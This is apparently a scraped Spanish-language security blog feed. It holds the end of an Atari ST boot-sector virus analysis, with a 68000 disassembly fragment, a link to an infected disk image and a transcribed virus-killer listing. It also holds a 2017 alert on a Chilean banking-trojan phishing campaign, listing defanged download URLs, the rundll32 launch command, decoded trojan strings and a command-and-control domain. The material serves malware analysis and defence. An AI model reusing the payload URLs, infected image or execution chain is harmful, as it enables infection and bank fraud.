0<span style="white-space: pre;"> </span></span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C4 PEA $0002E6(PC) 487A 0020 carga la pila con valor 0</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C8 MOVE.L #$00000001,-(A7) 2F3C 0000 0001 Setea parámetro para habilitar en mouse en modo relativo (si pongo un 0 lo deshabilita)</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002CE TRAP #14 4E4E Llama al XBIOS</span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002D0 ADDA.L #$0000000C,A7 DFFC 0000 000C </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002D6 EORI.B #$01,$02E6 0A38 0001 02E6 </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002DC MOVEM.L (A7)+,D1-A6 4CDF 7FFE </span></div><div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002E0 JMP $E05210 4EF9 00E0 5210 </span></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><b><u>Bibliografia utilizada</u></b></div><div>Atari ST Machine Language</div><div>Atari ST Internals</div><div>The ST Assembly Language Workshop</div><div><a href="https://st-news.com/uvk-book">UVK BOOK</a> Único sitio con mucha información sobre virus de Atari ST. Imperdible!</div><div><a href="http://www.lynn3686.com/monst.html">MonST</a><span style="font-family: arial;"> Debugger 68000</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Emulador STEEM SSE https://sourceforge.net/projects/steemsse/</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;"><a href="https://drive.google.com/file/d/1yWxc0cQ-zo6noezSLIqcEP2WSa7zBdjA/view?usp=sharing">ARCHIVOS</a> --- :-)</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Gostvirus.7z - Imagen de disco infectada con el BootSector virus.</span></div><div><span style="font-family: arial;">DevPAC.st - Utilidades de Assembler</span></div><div><span style="font-family: arial;">EasyReader - Disassembler</span></div><div><span style="font-family: arial;">TempleMon - Memory Monitor/Dump</span></div><div><span style="font-family: arial;">FastBasic - F.Basic Assembler</span></div><div><span style="font-family: arial;">Antidote.prg - Programa en F. Basic Assembler para eliminar BootSector Virus, muy interesante. Ver anexo.</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">anexo.</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Código Fuente en Fast Basic Assembler de un eliminador de bootsector virus.</span></div><div><span style="font-family: arial;"><br /></span></div><div><span style="font-family: arial;">Revista <a href="http://www.atarimania.com/atari-magazine-issue-atari-st-user-vol-3-no-10_1078.html">Atari-St-Usser vol 3 issue 10</a> pag 53 a 59</span></div><div><span style="font-family: arial; font-size: xx-small;"><br /></span></div><div><span style="font-family: arial; font-size: xx-small;"><div>40 \ Fast Basic assembler</div><div>50 RESERVE ODE,10000</div><div>60 F%=0PEN0UT "ANTIDOTE.PRG"</div><div>70 PROCASSEMBLE:CLOSE#F%:STOP</div><div>80 HIDEMOUS :BEGINUPDATE</div><div>90 CALL KILL</div><div>100 ENDUPDAT :PROCREGISTERS</div><div>110 END</div><div>120 DEF PROCASSEMBLE</div><div>130 FOR PASS =1 TO 2</div><div>140 PC=C0DE</div><div>150 [</div><div> OPT PASS,"l +D+H+W+",F%</div><div>KILL LEA TITLE(PC),A0</div><div> BSR MESSAGE</div><div>TEST LEA PROMPTCPC) ,A0</div><div> BSR MESSAGE</div><div> LEA HITMESS(PC),A0</div><div> BSR MESSAGE</div><div> BSR ENTER</div><div> BSR RDBOOT /Uan't read boot</div><div> TST D0</div><div> BMI FAIL</div><div> MOVE.L #BOOT,A0 \Apunta al Buffer del Boot</div><div> MOVE.W #255,D0 \FF</div><div> MOVE.L #0,D1</div><div>SUM ADD.W (A0)+,D1 <span style="white-space: pre;"> </span> \Test for</div><div> DBRA D0,SUM<span style="white-space: pre;"> </span> \a virus</div><div> CMP.W #$1234,D1</div><div> BNE OK</div><div>BAD LEA VIRUS(PC),A0</div><div> BSR MESSAGE</div><div> LEA KILLHESS(PC),A0</div><div> BSR MESSAGE</div><div> YES BSR ENTER</div><div> CMP.B #"Y",D0</div><div> BEQ DIE</div><div> CHP.B #"y",D0</div><div> BNE LOOP</div><div> DIE MOVE.L #BOOT,A0 \Kill v</div><div> ADD.L #40,A0</div><div> MOVE.W #235,D0</div><div> WIPE MOVE.W #0,(A0)+</div><div> DBRA D0,WIPE</div><div> BSR WRBOOT</div><div> TST D0</div><div> BHI FAIL</div><div> OK LEA CLEAN(PC),A0</div><div> BSR MESSAGE</div><div> LOOP LEA AGAIN(PC),A0</div><div> BSR MESSAGE</div><div> BSR ENTER</div><div> CMP.B #"Y',D0</div><div> BEQ TEST</div><div> CMP.B #"y",D0</div><div> BE8 TEST</div><div> LEA BYE(PC),A0</div><div> BSR MESSAGE</div><div> CLR.W -(A7)</div><div> TRAP #1</div><div> RTS</div><div>FAIL LEA ERMESS(PC),A0 \Error</div><div> BSR MESSAGE</div><div> BRA LOOP</div><div>RDBOOT</div><div> MOVE.W #1,-(A7) \Count</div><div> MOVE.W #0,-(A7) \Side</div><div> MOVE.W #0,-(A7) \Track</div><div> MOVE.W #1,-(A7) \Sect start</div><div> MOVE.W #0,-(A7) \Drive A</div><div> CLR.L -(A7)</div><div> MOVE.L #BOOT,-(A7)</div><div> MOVE.W #8,-(A7)</div><div> TRAP #14</div><div> ADD.L #20,A7</div><div> RTS</div><div>WRBOOT</div><div> MOVE.W #1,-(A7) \Count</div><div> MOVE.W #0,-(A7) \Side</div><div> MOVE.W #0,-(A7) \Track</div><div> MOVE.W #1,-(A7) \Sect start</div><div> MOVE.W #0,-(A7) \Drive A</div><div> CLR.L -(A7)</div><div> MOVE.L #BOOT,-(A7)</div><div> MOVE.W #9,-(A7)</div><div> TRAP #14</div><div> ADD.L #20,A7</div><div> RTS</div><div>MESSAGE</div><div> MOVE.L A0,-(A7)</div><div> MOVE.W #9,-(A7)</div><div> TRAP #1</div><div> ADD8.L #6,SP</div><div> RTS</div><div> ENTER</div><div> CLR.W, D0</div><div> MOVE.W #7,-(A7)</div><div> TRAP #1</div><div> ADDQ.L #2,A7</div><div> RTS</div><div> TITLE DC.B 27,"E","VIRUS KILLER"</div><div> DC.B 13,10,0</div><div> EVEN</div><div> PROMPT DC.B "PUT A DISC TO BE"</div><div> DC.B " TESTED INTO DRF</div><div> DC.B "VE A",13,10,0</div><div> EVEN</div><div> HITMESS DC.B "HIT A KEY TO CO"</div><div> DC.B "NTINUE",13,10,0</div><div> EVEN</div><div> VIRUS DC.B "BOOT PROGRAM DET"</div><div> DC.B "ECTED',13,10,0</div><div> EVEN</div><div> KILLMESS DC.B "REMOVE [Y/N]"</div><div> DC.B 13,10,0</div><div> EVEN</div><div> AGAIN DC.B "ANOTHER DISC ill</div><div> DC.B "NT, 13,10,0</div><div> EVEN</div><div> ERMESS DC.B "DISC ERROR"</div><div> DC.B 13,10,0</div><div> EVEN</div><div> BYE DC.B "GOODBYE",13,10,0</div><div> EVEN</div><div> CLEAN DC.B "DISC SAFE",13,10,0</div><div> EVEN</div><div> BOOT DS.B 512</div><div> ]</div><div>1350 NEXT PASS</div><div>1360 ENDPROC</div></span></div><div><div><br /></div></div></div><p></p>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-39806443634553873812020-09-10T12:53:00.002-07:002020-09-10T12:53:48.498-07:00Buenas! <p> Hace rato que tengo abandonado este humilde espacio, en breve comenzaremos con una nueva serie de analisis.</p><p><br /></p><p><br /></p><p>Saludos para todos!</p>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-43316637785188957542017-12-05T11:48:00.001-08:002017-12-05T12:07:09.815-08:00<span style="font-family: "arial" , "helvetica" , sans-serif;">#Alerta #Malware <b>CLARO <span style="background-color: white; color: #333333; white-space: nowrap;">Tienes una factura sin pagar! </span><span style="background-color: white;">Factura #4489790</span></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><span style="background-color: white;"><br /></span></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><span style="background-color: white;"><br /></span></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">En el día de hoy se esta realizando una campaña de phishing que esta propagando un malware que afecta a entidades Bancarias de Chile.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiaFZ_K07SouxYB4Wuj20hFg8yFH6l3TTCmxhx9TGGIsmMqWu0yGrNzhSAbG8U2Eev4MVXN7Xq9__EmCNstxG5te3vlHbMtRi9Nb3pHeUFn3dwWogJL6aPDDiS5dAKHAgsJ8LXDKfuEMw/s1600/claro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="544" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiaFZ_K07SouxYB4Wuj20hFg8yFH6l3TTCmxhx9TGGIsmMqWu0yGrNzhSAbG8U2Eev4MVXN7Xq9__EmCNstxG5te3vlHbMtRi9Nb3pHeUFn3dwWogJL6aPDDiS5dAKHAgsJ8LXDKfuEMw/s320/claro.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">hxxps[:]//bit[.]do/dVy4h</span></div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Se está utilizando el siguiente enlace corto para descargar un zip con un .js en su interior que se encuentra codificado con una simple ofuscación de ascii - > Hex -> Text y en otros casos de Hex -> text</span></div>
</div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzQ5eFEJcnCdPSnU1Kbpg9cNxzOKE8Qkj02m7AO0WajDqpjvszvOAX8i0AHImAKNH1_HKIwsDMNw_3mKnTscn0UeXO_n249lXsnq7EttzGVazvNr2qZ9JBBphlKZs-Bfg9mJ4PgPXxFRY/s1600/007.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="189" data-original-width="846" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzQ5eFEJcnCdPSnU1Kbpg9cNxzOKE8Qkj02m7AO0WajDqpjvszvOAX8i0AHImAKNH1_HKIwsDMNw_3mKnTscn0UeXO_n249lXsnq7EttzGVazvNr2qZ9JBBphlKZs-Bfg9mJ4PgPXxFRY/s640/007.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">El Javascript descarga un jpg de un sitio vulnerado, para luego renombrarlo y ejecutarlo con rundll32.exe</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">hxxp[:]//www.kabobpalace[.]ca/wp-content/plugins/klaaaaa[.]jpg </span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKB9N-JJE0UYWQnxSSTEzc89YyvXfd-EwTUBL1ims0VUgyPm-PNtIjliMqtyofs1NiD637g6AFJ6KEOxYwFJ-0feCmdpaNWsNeATVSWolJ8omg7a2mRzZkroWZw1FzbpauOt1lEXP9j1Y/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="1153" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKB9N-JJE0UYWQnxSSTEzc89YyvXfd-EwTUBL1ims0VUgyPm-PNtIjliMqtyofs1NiD637g6AFJ6KEOxYwFJ-0feCmdpaNWsNeATVSWolJ8omg7a2mRzZkroWZw1FzbpauOt1lEXP9j1Y/s640/01.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Detección en VirusTotal 7/67</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjauOwuIR1T_IOUJHBDXdwT3ZzQw3UKReIErxgCYnUwI1n56omStiBF1UyYpqMmiT-0yrVqFsXFOesksFMAMTAdvWKqwm4tpZ1DbzCDZ9nrHOFHYfpklxt6gHyimUEtWJBQ4v5aNWSfNWw/s1600/VT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="1093" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjauOwuIR1T_IOUJHBDXdwT3ZzQw3UKReIErxgCYnUwI1n56omStiBF1UyYpqMmiT-0yrVqFsXFOesksFMAMTAdvWKqwm4tpZ1DbzCDZ9nrHOFHYfpklxt6gHyimUEtWJBQ4v5aNWSfNWw/s640/VT.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Se ejecuta en el sistema de la siguiente manera.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">rundll32.exe C:\\ProgramData\\KLJ5TUXBGXY941Z\<b>K9JR7C34N3372CD.dij</b>,_a</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">El cuerpo del troyano tiene cadenas ofuscadas.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfWEdqL4AkEM1fA85drjTgeZ3pgHfd6Tsb3lsnotxODoCoNnQ7TblmqKnygZnIWnR2Q2PMyNgXIeCqWod1SCZYHIvCTu83P5Cs7CGt_IDAqXvH50RGQbORjwuW-f3jBn5GLuiiHiatOl8/s1600/008.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="783" height="416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfWEdqL4AkEM1fA85drjTgeZ3pgHfd6Tsb3lsnotxODoCoNnQ7TblmqKnygZnIWnR2Q2PMyNgXIeCqWod1SCZYHIvCTu83P5Cs7CGt_IDAqXvH50RGQbORjwuW-f3jBn5GLuiiHiatOl8/s640/008.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Podemos obtener de ellas los siguientes strings interensantes</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|Folder|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|Files|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|DownloadFile|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><|UploadFile|></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">VALOR - </span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">TASKKILL /F /</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Internet</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Google</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Mozilla</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">TASKKILL /F /]</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">En este momento estamos efectuando una modificacion</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">En este momento no podemos atenderlo</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Hola, Enviamos un codigo como simulacion de transaccion</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Su sistema será reiniciado</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Los datos ingresados son incorrectos</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ingrese el codigo</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">\Software\Microsoft\Windows\CurrentVersion\Run</span><br />
<b style="font-family: Arial, Helvetica, sans-serif;">chile.ddns.com.br</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;">Por otro lado podemos obtener las imagenes falsas que se le presentan a la victima para robar los datos de la tarjeta de coordenadas o tokens que se utilizan para realizar las transferencias.</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8jY5lEoM4iV8ABi4p6sGRNHFoxOwO26VhL8ffhT1apWDqnv9lf_1d10AoAtRSMN47p4IWTz4PHrNyRCkunq4KszHOPWuEY0diDHncXCHY6k5NZqZEYpGrRbV_m9SDmDoGZmoGsUGUME/s1600/0005.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="423" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8jY5lEoM4iV8ABi4p6sGRNHFoxOwO26VhL8ffhT1apWDqnv9lf_1d10AoAtRSMN47p4IWTz4PHrNyRCkunq4KszHOPWuEY0diDHncXCHY6k5NZqZEYpGrRbV_m9SDmDoGZmoGsUGUME/s320/0005.jpg" width="300" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaH0iLTMoOp2_lYPJLtf6cV8RH5ek1NvrXWCtEZNrBmx-0QDa2ccA-_pWZzbhH-lsEAD9tUEmX_CD5KxItmY2RQxkp0u3FriEPVxcvciGPVcAMNz-QTFI8xHoTOBcDFsguGLqrxrHLChQ/s1600/0004.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="425" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaH0iLTMoOp2_lYPJLtf6cV8RH5ek1NvrXWCtEZNrBmx-0QDa2ccA-_pWZzbhH-lsEAD9tUEmX_CD5KxItmY2RQxkp0u3FriEPVxcvciGPVcAMNz-QTFI8xHoTOBcDFsguGLqrxrHLChQ/s320/0004.jpg" width="304" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAzdQPT7mjOPGEB1vpOp4w-zJ37_NLeMHoSonYEoSq-IePUZ5vJK8q6-363kndHN50OFJRS47I-lO-7NJEtMSGIR_En_qpmkXVOjazPWxJShC7b5saIJqEDNi0ut_I7SzG5z-hkNhe5A/s1600/0003.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="622" data-original-width="622" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAzdQPT7mjOPGEB1vpOp4w-zJ37_NLeMHoSonYEoSq-IePUZ5vJK8q6-363kndHN50OFJRS47I-lO-7NJEtMSGIR_En_qpmkXVOjazPWxJShC7b5saIJqEDNi0ut_I7SzG5z-hkNhe5A/s320/0003.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsH2oTo9X6WZJqToDCNfGrU6WWVm0fE-3w-dvcRfvFAcjktxpFutLlsrwcBdEB8CsMvu0Rbr-hQ9kd67FXtn_l7TatSiV9tE-h5AitrFeNmua5oTVzZrBtnsHTzEA1yQp_Rqm1_AQdEVo/s1600/z9qIF65SjBgdD.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsH2oTo9X6WZJqToDCNfGrU6WWVm0fE-3w-dvcRfvFAcjktxpFutLlsrwcBdEB8CsMvu0Rbr-hQ9kd67FXtn_l7TatSiV9tE-h5AitrFeNmua5oTVzZrBtnsHTzEA1yQp_Rqm1_AQdEVo/s320/z9qIF65SjBgdD.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWzl2tp7SMTDmpLgBxbmCQ-o60nsQrMnPK-34H1LakVzTtXKaXKzCjhMzSGvaJAcFyrF_VQzz1GpWDvplALA8ORXrLaCO4IvvOOTm3TGRKKdchq8wYhOSnhf1JyzQPGJk7rZOOAosnhB0/s1600/z9qIF65SjBgdD.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWzl2tp7SMTDmpLgBxbmCQ-o60nsQrMnPK-34H1LakVzTtXKaXKzCjhMzSGvaJAcFyrF_VQzz1GpWDvplALA8ORXrLaCO4IvvOOTm3TGRKKdchq8wYhOSnhf1JyzQPGJk7rZOOAosnhB0/s320/z9qIF65SjBgdD.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBiS37c8k2wZuCUULBEwQkcjQq9YBZW1C_sf3qhIXUpntkIbybfPb_2uX4DBVdVQ0-qYwRhLU-HHz_67PLCsRf8q9DeJmD4wyk8qypUFiLHJAi8BEf29pMZ-BNGMJ4ThAVwwVCKQIGcZQ/s1600/yA4gKtr3.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBiS37c8k2wZuCUULBEwQkcjQq9YBZW1C_sf3qhIXUpntkIbybfPb_2uX4DBVdVQ0-qYwRhLU-HHz_67PLCsRf8q9DeJmD4wyk8qypUFiLHJAi8BEf29pMZ-BNGMJ4ThAVwwVCKQIGcZQ/s320/yA4gKtr3.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJRihbS8_TCh2Qvfn_DIrERwZmW1SnPiPbymI3wRelIMv1dwW8Sr22IjUBdGvD9Ijbv03OrNqdqwe_g637Cyyd3Nv1hLh4Ec5DND5Sh8_AP7W-MTqe7QUSd2amSflxxoe37-St3VTtQs/s1600/yA4gKtr9.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJRihbS8_TCh2Qvfn_DIrERwZmW1SnPiPbymI3wRelIMv1dwW8Sr22IjUBdGvD9Ijbv03OrNqdqwe_g637Cyyd3Nv1hLh4Ec5DND5Sh8_AP7W-MTqe7QUSd2amSflxxoe37-St3VTtQs/s320/yA4gKtr9.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOV5ePStw_uGonKq4cctYCZjXBsKbwyE6P8ONEVmwXvcd9uKLiJD6xrfjZuGe550Byx71jmhyQHjTNTAw5PP3LVqT8J1gUtFa05A4Wkx64IdUeGq2btprFCdBeK5hSMRwd2WkNOAS2y_0/s1600/yA4gKtr.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOV5ePStw_uGonKq4cctYCZjXBsKbwyE6P8ONEVmwXvcd9uKLiJD6xrfjZuGe550Byx71jmhyQHjTNTAw5PP3LVqT8J1gUtFa05A4Wkx64IdUeGq2btprFCdBeK5hSMRwd2WkNOAS2y_0/s320/yA4gKtr.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7W2Skm6f5TXrjEXqbMeSZE2FgTg5Ef7GtKsdOraixexFOxCSkXl5uNNLh70prrosUWlKmYmO40SmUt_BbW35MCV7UehpI0hVisLmaxNc5H3asmZWNea-d5ZtsBP7PBdzFJupb6VGVDc/s1600/yA4gKtr5.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7W2Skm6f5TXrjEXqbMeSZE2FgTg5Ef7GtKsdOraixexFOxCSkXl5uNNLh70prrosUWlKmYmO40SmUt_BbW35MCV7UehpI0hVisLmaxNc5H3asmZWNea-d5ZtsBP7PBdzFJupb6VGVDc/s320/yA4gKtr5.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioynVU1ksNuLFL5AsAKy_IiEdS0RU8wLwccudb_hOV7sejSoT-DBluOQ78O6qwwjUvxOJxvK8AY8WK5fZ03OCRCmIWXLBTZkGs2JVtfBkFwuUE5RcIOq_lpfyPDRzirdOAUQA4gsui9iY/s1600/yA4gKtr5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioynVU1ksNuLFL5AsAKy_IiEdS0RU8wLwccudb_hOV7sejSoT-DBluOQ78O6qwwjUvxOJxvK8AY8WK5fZ03OCRCmIWXLBTZkGs2JVtfBkFwuUE5RcIOq_lpfyPDRzirdOAUQA4gsui9iY/s320/yA4gKtr5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIyH_iTyaWq-xDzkT02668Efh4q0iDI2eRc-O67aJymm46By44KNOJupzD8CTA10owuMT79X0ujF6rBqsmJcbSXrQTSUJ1y51fPnT6zk_gDwqVVB9Tso38ppAAhNXiBdHbmaMMVp74MlI/s1600/yA4gKtr7.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIyH_iTyaWq-xDzkT02668Efh4q0iDI2eRc-O67aJymm46By44KNOJupzD8CTA10owuMT79X0ujF6rBqsmJcbSXrQTSUJ1y51fPnT6zk_gDwqVVB9Tso38ppAAhNXiBdHbmaMMVp74MlI/s320/yA4gKtr7.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
